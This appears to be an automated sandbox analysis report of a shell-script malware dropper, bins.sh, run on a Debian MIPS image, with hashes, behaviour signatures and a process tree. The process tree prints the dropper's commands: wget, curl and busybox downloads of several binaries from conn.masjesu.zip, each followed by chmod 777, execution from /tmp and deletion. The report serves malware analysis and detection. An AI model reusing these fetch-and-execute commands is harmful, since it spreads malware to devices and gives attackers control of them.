Analysis
-
max time kernel
150s -
max time network
23s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
01-11-2024 03:17
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
480229a700195be388039fc504594b0c
-
SHA1
627e9a54a2c3a15744b942126bbafb41eb836714
-
SHA256
0f7f04fb9dade4dd143c40d029fdd9d23dd535f1e913cc19b3e64ccde9dc7299
-
SHA512
07888fd6c46abd688a1589d7e67a9640e574632fae10e6c8cb73750602c6667352e9c937c98bdf5e6874af5c9eec4c1121c06a963b842e0086e61ef4370e66d6
-
SSDEEP
192:HFd8hXTEnFpUXP0EkI6E/FpUXPtGFd8hXTcA:EanFpUXP0Ed6E/FpUXPxmA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 760 chmod 779 chmod 819 chmod 829 chmod 752 chmod -
Executes dropped EXE 5 IoCs
ioc pid Process /tmp/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ 753 NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ /tmp/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j 761 sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j /tmp/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di 780 Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di /tmp/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR 820 UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR /tmp/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar 830 yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 17 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 751 busybox 756 wget 815 busybox 828 busybox 833 wget 747 curl 765 curl 773 busybox 784 wget 799 curl 824 wget 826 curl 727 wget 757 curl 759 busybox 835 curl 764 wget -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar busybox File opened for modification /tmp/E0hLfwgFRpneb3m9lzPzGjSoCstaDqrfAW wget File opened for modification /tmp/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j curl File opened for modification /tmp/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di curl File opened for modification /tmp/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di busybox File opened for modification /tmp/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR wget File opened for modification /tmp/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar wget File opened for modification /tmp/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar curl File opened for modification /tmp/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ wget File opened for modification /tmp/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ curl File opened for modification /tmp/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ busybox File opened for modification /tmp/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j busybox File opened for modification /tmp/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:718
-
/bin/rm/bin/rm bins.sh2⤵PID:721
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:727
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/chmodchmod 777 NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ./NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm NzE4S1HqAuTbIdpkp4eqQuwbsHSzjsIENZ2⤵PID:755
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j2⤵
- System Network Configuration Discovery
PID:756
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:759
-
-
/bin/chmodchmod 777 sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j./sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm sm6cPXOBEn8iBLmIS0vsAlutyRYSOYBm6j2⤵PID:763
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di2⤵
- System Network Configuration Discovery
PID:764
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:773
-
-
/bin/chmodchmod 777 Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di./Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm Bj8nME0lAe04KZbmbp2cQQCbvnofHNd5di2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:784
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR2⤵
- System Network Configuration Discovery
PID:815
-
-
/bin/chmodchmod 777 UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR./UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm UT94wIhygFy341AXcLUiJ8zSsR02qN7cQR2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:828
-
-
/bin/chmodchmod 777 yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar./yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm yax2yLqAEGSIrQgnU1VyP8NobhAb74D0ar2⤵PID:832
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E0hLfwgFRpneb3m9lzPzGjSoCstaDqrfAW2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:833
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E0hLfwgFRpneb3m9lzPzGjSoCstaDqrfAW2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:835
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
93KB
MD58fad5e89ce3d2b6159ac2ce2fdf7c084
SHA127105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA25624689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA51271689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
-
Filesize
158KB
MD5d8e96e2fdd3c610ec19128e18de5abde
SHA110cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592
-
Filesize
80KB
MD522c527269cbd9b42f4ade79f52757efb
SHA1c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA5127b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
129KB
MD554bec959d900ad930dc662f8092da57d
SHA19ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40
-
Filesize
95KB
MD5c20c610e14b8e59f5f8258a55fe7f27d
SHA1e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471